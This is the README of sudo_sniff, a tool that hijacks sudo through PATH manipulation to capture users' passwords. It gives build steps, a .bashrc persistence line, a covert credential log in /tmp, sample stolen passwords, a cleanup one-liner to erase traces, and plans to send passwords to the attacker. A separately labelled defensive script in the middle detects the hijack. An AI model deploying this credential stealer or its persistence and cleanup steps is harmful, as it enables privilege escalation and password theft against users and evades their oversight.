sudo_sniff is a simple program that attempts to steal the user's password while they run sudo, without arousing any suspicion. The idea is to modify the user's
$PATH so that sudo is hijacked when the user executes it. This could be used in post-exploitation as an alternative route for achieving root access (given that the user has the required sudo permissions).
sudo_sniff will store both correct and incorrect password entries at the following location by default: /tmp/.temp5678
- Hide the victim's input
- Add a function to either send the password to the attacker or save it on disk
- sudo may be in different locations on different systems; perhaps implement a function to locate it
- [BUG] When the victim enters their input, the text asking for the password is printed multiple times.
```console
hunter@nsa:~$ git clone firstname.lastname@example.org:mjdubell/sudo_sniff.git
hunter@nsa:~$ cd sudo_sniff/
hunter@nsa:~$ make
hunter@nsa:~$ ./sudo whoami
```
```console
victim@server:~$ mkdir $HOME/.payload
victim@server:~$ gcc -Wall -g -o $HOME/.payload/sudo sudo_sniff.c
victim@server:~$ echo 'export PATH="$HOME/.payload:$PATH"' >> $HOME/.bashrc
```
Note: Make sure sudo is executable.
```console
victim@server:~$ rm -rf $HOME/.payload; rm /tmp/.temp5678; sed '/export PATH="$HOME\/\.payload:$PATH"/d' .bashrc > tmp && mv tmp .bashrc
```
Note: the shell history will reveal the cleanup command.
Retrieve the password:
```console
victim@server:~$ cat /tmp/.temp5678
victim:mypasword:ERROR
victim:mypassword:SUCCESS
```
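A defender-side check, added here and not part of sudo_sniff: it audits a PATH value for the hijack described above (a `sudo` that resolves from a user-owned directory ahead of the system locations) and counts PATH-prepending lines in a shell rc file such as the `.bashrc` line the install step appends. The function names and the default trusted-directory list are this example's own assumptions.

```shell
#!/bin/sh
# Defensive audit (added example, not part of sudo_sniff): find which
# directory `sudo` would be run from and flag the $HOME/.payload pattern.

# Print the first PATH entry holding an executable `sudo`.
# $1: PATH value to inspect. Returns 1 if no sudo is found anywhere.
resolve_sudo_dir() {
    _rest="$1:"
    while [ -n "$_rest" ]; do
        _d=${_rest%%:*}; _rest=${_rest#*:}
        [ -z "$_d" ] && _d=.            # empty entry means current directory
        if [ -f "$_d/sudo" ] && [ -x "$_d/sudo" ]; then
            printf '%s\n' "$_d"; return 0
        fi
    done
    return 1
}

# Classify where `sudo` resolves from.
# $1: PATH value; $2: colon-separated trusted directories (assumed default:
#     the usual system locations). Prints one of:
#     ok:<dir> | home:<dir> | untrusted:<dir> | missing
audit_sudo_path() {
    _trusted=${2:-/usr/bin:/bin:/usr/sbin:/sbin}
    _dir=$(resolve_sudo_dir "$1") || { echo missing; return 1; }
    case ":$_trusted:" in
        *":$_dir:"*) echo "ok:$_dir"; return 0 ;;
    esac
    case "$_dir" in
        "$HOME"/*) echo "home:$_dir" ;;   # the $HOME/.payload pattern
        *)         echo "untrusted:$_dir" ;;
    esac
    return 1
}

# Count rc-file lines that prepend a directory to PATH, e.g.
# export PATH="$HOME/.payload:$PATH". $1: rc file path (0 if unreadable).
count_path_prepends() {
    [ -r "$1" ] || { echo 0; return 0; }
    grep -cE '^[[:space:]]*(export[[:space:]]+)?PATH=.*:\$PATH' "$1" || true
}
```

Run `audit_sudo_path "$PATH"` on a live shell; anything other than `ok:` deserves a look at the rc files that `count_path_prepends` points to.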
- Fork it!
- Create your feature branch: `git checkout -b my-new-feature`
- Commit your changes: `git commit -am 'Add some feature'`
- Push to the branch: `git push origin my-new-feature`
- Submit a pull request :D